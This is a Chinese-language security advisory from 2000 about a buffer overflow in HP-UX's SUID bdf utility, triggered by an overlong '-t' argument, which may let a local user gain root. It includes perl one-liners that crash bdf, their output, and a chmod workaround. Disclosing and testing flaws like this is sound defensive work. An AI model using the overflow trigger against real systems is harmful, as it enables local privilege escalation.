安全研究
安全漏洞
HP-UX bdf -t 参数缓冲区溢出漏洞
发布日期:2000-07-28
更新日期:2000-07-28
受影响系统:
HP-UX B.11.00
描述:
HPUX所带的bdf程序用来报告系统的自由磁盘块数目。"-t"选项用来指定文件系统
类型。bdf缺省被设置了SUID权限。如果提供一个很长的参数给"-t",将导致bdf
发生缓冲区溢出。本地用户可能获得root权限。
<* 来源:Kyong-won Cho <dubhe@HACKERSLAB.COM> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ bdf -t `perl -e 'print "A"x2415'`
bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA..omited...AAAAAAAAAAAAAAAA : No such file or directory
usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
$ bdf -t `perl -e 'print "A"x2416'`
Memory fault
$
<bash environment>
bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
Segmentation fault
bash-2.04$
建议:
暂无
临时解决办法:去除bdf的suid属性.
chmod 755 `which bdf`
浏览次数:5956
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
